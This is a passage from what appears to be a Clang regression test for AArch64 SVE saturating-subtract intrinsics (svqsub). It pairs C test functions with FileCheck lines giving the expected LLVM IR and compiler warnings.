[[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 2 x i64> poison, i64 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 2 x i64> [[DOTSPLATINSERT]], <vscale x 2 x i64> poison, <vscale x 2 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sel.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> zeroinitializer) // CPP-CHECK-NEXT: [[TMP3:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[TMP2]], <vscale x 2 x i64> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 2 x i64> [[TMP3]] // svint64_t test_svqsub_n_s64_z(svbool_t pg, svint64_t op1, int64_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_s64_z'}} return SVE_ACLE_FUNC(svqsub,_n_s64,_z,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_u8_z( // CHECK-NEXT: entry: // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 16 x i8> poison, i8 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP0:%.*]] = shufflevector <vscale x 16 x i8> [[DOTSPLATINSERT]], <vscale x 16 x i8> poison, <vscale x 16 x i32> zeroinitializer // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sel.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> zeroinitializer) // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.uqsub.nxv16i8(<vscale x 16 x i1> [[PG]], <vscale x 16 x i8> [[TMP1]], <vscale x 16 x i8> [[TMP0]]) // CHECK-NEXT: ret <vscale x 16 x i8> [[TMP2]] // // CPP-CHECK-LABEL: @_Z18test_svqsub_n_u8_zu10__SVBool_tu11__SVUint8_th( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 16 x i8> poison, i8 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP0:%.*]] = shufflevector <vscale x 16 x i8> [[DOTSPLATINSERT]], <vscale x 16 x i8> poison, <vscale x 16 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sel.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> zeroinitializer) // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.uqsub.nxv16i8(<vscale x 16 x i1> [[PG]], <vscale x 16 x i8> [[TMP1]], <vscale x 16 x i8> [[TMP0]]) // CPP-CHECK-NEXT: ret <vscale x 16 x i8> [[TMP2]] // svuint8_t test_svqsub_n_u8_z(svbool_t pg, svuint8_t op1, uint8_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_u8_z'}} return SVE_ACLE_FUNC(svqsub,_n_u8,_z,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_u16_z( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 8 x i16> poison, i16 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 8 x i16> [[DOTSPLATINSERT]], <vscale x 8 x i16> poison, <vscale x 8 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sel.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> zeroinitializer) // CHECK-NEXT: [[TMP3:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.uqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[TMP2]], <vscale x 8 x i16> [[TMP1]]) // CHECK-NEXT: ret <vscale x 8 x i16> [[TMP3]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_u16_zu10__SVBool_tu12__SVUint16_tt( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 8 x i16> poison, i16 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 8 x i16> [[DOTSPLATINSERT]], <vscale x 8 x i16> poison, <vscale x 8 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sel.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> zeroinitializer) // CPP-CHECK-NEXT: [[TMP3:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.uqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[TMP2]], <vscale x 8 x i16> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 8 x i16> [[TMP3]] // svuint16_t test_svqsub_n_u16_z(svbool_t pg, svuint16_t op1, uint16_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_u16_z'}} return SVE_ACLE_FUNC(svqsub,_n_u16,_z,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_u32_z( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 4 x i32> poison, i32 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 4 x i32> [[DOTSPLATINSERT]], <vscale x 4 x i32> poison, <vscale x 4 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sel.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> zeroinitializer) // CHECK-NEXT: [[TMP3:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.uqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[TMP2]], <vscale x 4 x i32> [[TMP1]]) // CHECK-NEXT: ret <vscale x 4 x i32> [[TMP3]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_u32_zu10__SVBool_tu12__SVUint32_tj( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 4 x i32> poison, i32 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 4 x i32> [[DOTSPLATINSERT]], <vscale x 4 x i32> poison, <vscale x 4 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sel.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> zeroinitializer) // CPP-CHECK-NEXT: [[TMP3:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.uqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[TMP2]], <vscale x 4 x i32> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 4 x i32> [[TMP3]] // svuint32_t test_svqsub_n_u32_z(svbool_t pg, svuint32_t op1, uint32_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_u32_z'}} return SVE_ACLE_FUNC(svqsub,_n_u32,_z,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_u64_z( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 2 x i64> poison, i64 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 2 x i64> [[DOTSPLATINSERT]], <vscale x 2 x i64> poison, <vscale x 2 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sel.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> zeroinitializer) // CHECK-NEXT: [[TMP3:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.uqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[TMP2]], <vscale x 2 x i64> [[TMP1]]) // CHECK-NEXT: ret <vscale x 2 x i64> [[TMP3]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_u64_zu10__SVBool_tu12__SVUint64_tm( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 2 x i64> poison, i64 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 2 x i64> [[DOTSPLATINSERT]], <vscale x 2 x i64> poison, <vscale x 2 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sel.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> zeroinitializer) // CPP-CHECK-NEXT: [[TMP3:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.uqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[TMP2]], <vscale x 2 x i64> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 2 x i64> [[TMP3]] // svuint64_t test_svqsub_n_u64_z(svbool_t pg, svuint64_t op1, uint64_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_u64_z'}} return SVE_ACLE_FUNC(svqsub,_n_u64,_z,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_s8_m( // CHECK-NEXT: entry: // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 16 x i8> poison, i8 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP0:%.*]] = shufflevector <vscale x 16 x i8> [[DOTSPLATINSERT]], <vscale x 16 x i8> poison, <vscale x 16 x i32> zeroinitializer // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[TMP0]]) // CHECK-NEXT: ret <vscale x 16 x i8> [[TMP1]] // // CPP-CHECK-LABEL: @_Z18test_svqsub_n_s8_mu10__SVBool_tu10__SVInt8_ta( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 16 x i8> poison, i8 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP0:%.*]] = shufflevector <vscale x 16 x i8> [[DOTSPLATINSERT]], <vscale x 16 x i8> poison, <vscale x 16 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[TMP0]]) // CPP-CHECK-NEXT: ret <vscale x 16 x i8> [[TMP1]] // svint8_t test_svqsub_n_s8_m(svbool_t pg, svint8_t op1, int8_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_s8_m'}} return SVE_ACLE_FUNC(svqsub,_n_s8,_m,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_s16_m( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 8 x i16> poison, i16 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 8 x i16> [[DOTSPLATINSERT]], <vscale x 8 x i16> poison, <vscale x 8 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[TMP1]]) // CHECK-NEXT: ret <vscale x 8 x i16> [[TMP2]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_s16_mu10__SVBool_tu11__SVInt16_ts( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 8 x i16> poison, i16 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 8 x i16> [[DOTSPLATINSERT]], <vscale x 8 x i16> poison, <vscale x 8 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 8 x i16> [[TMP2]] // svint16_t test_svqsub_n_s16_m(svbool_t pg, svint16_t op1, int16_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_s16_m'}} return SVE_ACLE_FUNC(svqsub,_n_s16,_m,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_s32_m( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 4 x i32> poison, i32 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 4 x i32> [[DOTSPLATINSERT]], <vscale x 4 x i32> poison, <vscale x 4 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[TMP1]]) // CHECK-NEXT: ret <vscale x 4 x i32> [[TMP2]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_s32_mu10__SVBool_tu11__SVInt32_ti( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 4 x i32> poison, i32 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 4 x i32> [[DOTSPLATINSERT]], <vscale x 4 x i32> poison, <vscale x 4 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 4 x i32> [[TMP2]] // svint32_t test_svqsub_n_s32_m(svbool_t pg, svint32_t op1, int32_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_s32_m'}} return SVE_ACLE_FUNC(svqsub,_n_s32,_m,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_s64_m( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 2 x i64> poison, i64 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 2 x i64> [[DOTSPLATINSERT]], <vscale x 2 x i64> poison, <vscale x 2 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[TMP1]]) // CHECK-NEXT: ret <vscale x 2 x i64> [[TMP2]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_s64_mu10__SVBool_tu11__SVInt64_tl( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 2 x i64> poison, i64 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 2 x i64> [[DOTSPLATINSERT]], <vscale x 2 x i64> poison, <vscale x 2 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 2 x i64> [[TMP2]] // svint64_t test_svqsub_n_s64_m(svbool_t pg, svint64_t op1, int64_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_s64_m'}} return SVE_ACLE_FUNC(svqsub,_n_s64,_m,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_u8_m( // CHECK-NEXT: entry: // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 16 x i8> poison, i8 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP0:%.*]] = shufflevector <vscale x 16 x i8> [[DOTSPLATINSERT]], <vscale x 16 x i8> poison, <vscale x 16 x i32> zeroinitializer // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.uqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[TMP0]]) // CHECK-NEXT: ret <vscale x 16 x i8> [[TMP1]] // // CPP-CHECK-LABEL: @_Z18test_svqsub_n_u8_mu10__SVBool_tu11__SVUint8_th( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 16 x i8> poison, i8 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP0:%.*]] = shufflevector <vscale x 16 x i8> [[DOTSPLATINSERT]], <vscale x 16 x i8> poison, <vscale x 16 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.uqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[TMP0]]) // CPP-CHECK-NEXT: ret <vscale x 16 x i8> [[TMP1]] // svuint8_t test_svqsub_n_u8_m(svbool_t pg, svuint8_t op1, uint8_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_u8_m'}} return SVE_ACLE_FUNC(svqsub,_n_u8,_m,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_u16_m( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 8 x i16> poison, i16 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 8 x i16> [[DOTSPLATINSERT]], <vscale x 8 x i16> poison, <vscale x 8 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.uqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[TMP1]]) // CHECK-NEXT: ret <vscale x 8 x i16> [[TMP2]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_u16_mu10__SVBool_tu12__SVUint16_tt( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 8 x i16> poison, i16 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 8 x i16> [[DOTSPLATINSERT]], <vscale x 8 x i16> poison, <vscale x 8 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.uqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 8 x i16> [[TMP2]] // svuint16_t test_svqsub_n_u16_m(svbool_t pg, svuint16_t op1, uint16_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_u16_m'}} return SVE_ACLE_FUNC(svqsub,_n_u16,_m,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_u32_m( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 4 x i32> poison, i32 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 4 x i32> [[DOTSPLATINSERT]], <vscale x 4 x i32> poison, <vscale x 4 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.uqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[TMP1]]) // CHECK-NEXT: ret <vscale x 4 x i32> [[TMP2]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_u32_mu10__SVBool_tu12__SVUint32_tj( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 4 x i32> poison, i32 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 4 x i32> [[DOTSPLATINSERT]], <vscale x 4 x i32> poison, <vscale x 4 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.uqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 4 x i32> [[TMP2]] // svuint32_t test_svqsub_n_u32_m(svbool_t pg, svuint32_t op1, uint32_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_u32_m'}} return SVE_ACLE_FUNC(svqsub,_n_u32,_m,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_u64_m( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 2 x i64> poison, i64 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 2 x i64> [[DOTSPLATINSERT]], <vscale x 2 x i64> poison, <vscale x 2 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.uqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[TMP1]]) // CHECK-NEXT: ret <vscale x 2 x i64> [[TMP2]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_u64_mu10__SVBool_tu12__SVUint64_tm( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 2 x i64> poison, i64 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 2 x i64> [[DOTSPLATINSERT]], <vscale x 2 x i64> poison, <vscale x 2 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.uqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 2 x i64> [[TMP2]] // svuint64_t test_svqsub_n_u64_m(svbool_t pg, svuint64_t op1, uint64_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_u64_m'}} return SVE_ACLE_FUNC(svqsub,_n_u64,_m,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_s8_x( // CHECK-NEXT: entry: // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 16 x i8> poison, i8 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP0:%.*]] = shufflevector <vscale x 16 x i8> [[DOTSPLATINSERT]], <vscale x 16 x i8> poison, <vscale x 16 x i32> zeroinitializer // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[TMP0]]) // CHECK-NEXT: ret <vscale x 16 x i8> [[TMP1]] // // CPP-CHECK-LABEL: @_Z18test_svqsub_n_s8_xu10__SVBool_tu10__SVInt8_ta( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 16 x i8> poison, i8 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP0:%.*]] = shufflevector <vscale x 16 x i8> [[DOTSPLATINSERT]], <vscale x 16 x i8> poison, <vscale x 16 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 16 x i8> 